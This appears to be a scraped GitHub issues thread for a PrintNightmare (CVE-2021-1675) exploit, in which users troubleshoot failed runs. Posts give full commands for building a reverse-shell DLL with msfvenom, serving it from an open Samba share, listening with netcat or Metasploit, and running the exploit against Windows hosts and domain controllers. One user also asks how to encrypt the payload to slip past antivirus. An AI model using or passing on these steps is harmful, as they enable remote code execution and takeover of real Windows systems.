C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll [*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss] [-] Connection Failed
i shared the re.dll with samba on linux , since it was in WSL i thought it did not work, so i just shared a folder with the re.dll inside and gave everyone permission to read/write into the folder and disable password requirement in the advanced sharing settings .
i made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could.)
what am i doing wrong ?
thanks !
Hi team,
I installed impacket as instruction but I still have this issue:
└─$ sudo python CVE-2021-1675.py ntp.vn/tuan_nt:1235&*[email protected] '\10.10.14.39\smb\reverse.dll'
Traceback (most recent call last):
File "CVE-2021-1675.py", line 2, in
from impacket.dcerpc.v5 import rprn
ImportError: No module named impacket.dcerpc.v5
Help me please!
Hi,
setup: Kali Linux (192.168.0.10)
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f dll -o /tmp/rev.dll
/etc/samba/smb.conf
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[public]
comment = Samba
path = /tmp
guest ok = yes
read only = no
browsable = yes
force user = root
Share works, can open it from the Win10 System with \192.168.0.1\public
can see the rev.dll
# smbstatus 1 ⨯
Samba version 4.13.5-Debian
PID Username Group Machine Protocol Version Encryption Signing
----------------------------------------------------------------------------------------------------------------------------------------
2839 nobody nogroup 192.168.0.12 (ipv4:192.168.0.12:49924) SMB3_11 - -
msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.0.10
set lport 4444
run
# python3 CVE-2021-1675.py ./anna:[email protected] '\\192.168.0.10\\public\\rev.dll'
[*] Connecting to ncacn_np:192.168.0.12[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'
victim: Windows 10 21H1 (64bit) build 19043 (192.168.0.12) firewall is disabled
When try to copy the DLL to Desktop vor example:
But if I disable the VirusCheck the same error with the python script
How to fix it ?
This is how I was able to reproduce the exploit in a virtual environment:
The best practice is to create Python virtual Environment
python3 -m venv PrintNightmare
source PrintNightmare/bin/activate
git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody
Spin up SMB share:
impacket-smbserver smb /tmp/
In case you have some problems with the SMB try to use build-in SMBD service
service smbd start
Create Reverse shell Payload as a DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll
nc -lnvp 9001
python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'
Machines:
I want to encrypt the dll payload how can i do it >>!?
uninstalled previous impacket installation and downloaded from git clone https://github.com/cube0x0/impacket
getting the below error: Any Idea ?
i try to use sharp PrintNightmare LPE with adduser.dll.
use visual studio to build to sharpprintnightmare.exe.
and use this C script to compile the adduser.dll - https://github.com/newsoft/adduser
i run this exploit on many windows version and nothing happen.
please your help. thanks
Hello.
I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
Has anyone had the same problem or know how I can solve it please?
Complete stdout:
"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:[email protected] '\172.16.224.6\smb\fakeprinter.dll'
[] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing \172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
File "./CVE-2021-1675.py", line 176, in
main(dce, pDriverPath, options.share)
File "./CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."
User exist in the AD: "balves"
Target: WS 2019
Thanks
Getting this error when running exploit:
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0xc1 - ERROR_BAD_EXE_FORMAT - %1 is not a valid Win32 application.
I've tried both 32bit and 64bit DLLs via MSFVenom but get the same error for each.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.